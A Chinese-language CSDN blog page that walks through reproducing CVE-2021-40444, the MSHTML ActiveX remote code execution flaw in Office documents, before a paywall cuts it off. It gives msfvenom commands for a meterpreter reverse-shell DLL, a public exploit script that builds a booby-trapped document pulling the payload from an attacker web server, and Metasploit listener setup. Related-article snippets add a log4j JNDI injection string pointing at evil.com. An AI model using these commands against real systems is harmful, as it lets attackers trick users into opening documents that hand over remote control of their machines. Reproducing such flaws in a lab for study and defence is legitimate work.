CVE-2021-40444 复现

最新推荐文章于 2024-05-29 12:38:45 发布
最新推荐文章于 2024-05-29 12:38:45 发布
阅读量1.5k 收藏 10
点赞数 1
分类专栏: 红蓝对抗-攻防安全 文章标签: ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/120386814
版权

利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档

复现环境:Ubuntu + WIN10 

利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444

0x01 生成恶意dll :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll

需要提前下载lcab库

 生成木马,url为打开文档后拉取恶意文件的web地址

python3 exploit.py generate test/shell.dll http://xxx.xxx.xxx.xxx:8088/

 

0x02 msf监听:

use exploit/multi/handler
set lhost xx.xx.xx.xx
set lport 4
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Adsatrtgo
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
CVE-2021-40444 0 day漏洞利用
HBohan的博客
09-13 4428
9月7日,微软发布安全公告称发现Windows IE MSHTML中的一个远程代码执行漏洞,CVE编号为CVE-2021-40444。由于未发布漏洞补丁,微软只称该漏洞可以利用恶意ActiveX控制来利用office 365和office 2019来在受影响的Windows 10主机上下载和安装恶意软件。 随后,研究人员发现有攻击活动使用该恶意word文档,即该漏洞的0 day在野利用。 当office打开一个文档后,会检查是否标记为"Mark of the Web" (MoTW),这表示它来源于互联网。如
CVE-2021-40444复现
weixin_42345596的博客
09-16 1724
CVE-2021-40444 漏洞描述 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1197
此漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
CVE-2021-40444_复现
PureDust的博客
09-14 924
CVE-2021-40444_Microsoft MSHTML 远程代码执行复现准备上线设置cs,powershell,端口设置了8080复制word_dat为tmp_doc制作dll文件 准备 1.下载github的代码 https://github.com/lockedbyte/CVE-2021-40444 2.安装lcab sudo apt-get install lcab 3.安装编译环境 apt-get install mingw-w64 上线 设置cs,powershell,端口设置了808
CVE-2021-40444漏洞复现详细
热门推荐
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添...
端口复用实现
Shanfenglan's blog
12-24 3838
文章目录1. 前言2. 实现2.1 开启http服务2.2 开启socks服务2.3 通过protoplex实现端口复用2.4 最后一步端口转发2.5 最终效果参考文章 1. 前言 我们要实现的是外界访问80端口,根据协议不同的到的响应就不一样,使用的协议可以是socks也可以是http。 2. 实现 2.1 开启http服务 python -m http.server 80 2.2 开启socks服务 frsocks_windows_386.exe -sockstype fsocks -listen
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-40444:MSHTML RCE预警
Fly_鹏程万里
09-13 2506
影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019
CVE-2021-40444分析报告微软MHTML远程命令执行漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1305
CVE-2021-40444漏洞概述.2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 VirusTotal的 Microsoft Word 文档(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 对样本进行了
漏洞复现CVE-2021-40444(Microsoft MSHTML 远程代码执行漏洞)
weixin_42282189的博客
09-24 1256
作者:墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。 目前,该漏洞EXP已公开,微软官方公布已检测到在野利用,已发布修复补丁。 影响范围: Windows Server, version 20H2 (Server Core Installation) .
CVE-2021-40444漏洞复现
1ance's blog
09-25 3399
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
weblogic中间件漏洞复现
kukudeshuo的博客
02-09 1189
weblogic中间件漏洞复现 weblogic介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应
CVE-2021-40444:Windows MSHTML 0day漏洞利用
HBohan的博客
09-11 970
研究人员发现Windows MSHTML 0day漏洞利用,微软发布预防措施。 近日,多个安全研究人员向微软分别报告了MSHTML中的一个0 day远程代码执行漏洞。并发现了该漏洞的在野利用攻击活动。 MSHTML是Windows中用来渲染web页面的软件组件。虽然主要与IE相关,但也用于其他版本,包括Skype、Outlook、Visual Studio等。 CVE-2021-40444 研究人员在MSHTML中发现的0 day漏洞CVE编号为CVE-2021-40444,cvss评分为8.8分。由于MS
【安全漏洞】深入剖析CVE-2021-40444-Cabless利用链
HBohan的博客
02-27 627
本文主要分析了CVE-2021-40444的Cabless利用链中存在的路径问题以及对之前技术研判内容进行补充。通过分析CVE-2021-40444新利用链,可以看到该漏洞的根本原因是Office文档可以通过MHTML协议请求访问远程HTML页面从而执行JavaScript代码,并最终通过Url Scheme启动本地应用程序执行投递的恶意代码,而中间投递恶意代码的方式是可以替换的。
web网络安全——网站入侵(三)
lv小笨鸟要先飞啦
12-21 4123
2) 详细信息分析 联系人信息分析: https://github.com/XX.XX.XX.XX?language=objective-c&tab=stars 结论:网站由ruby编写,根据博主个人转载发表日志。 Nginx漏洞分析: 查询得出cve-2013-4547、cve-2014-3616漏洞利用可能性最高 利用分析: Cve-2014-3616 参考资料链接: ht
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值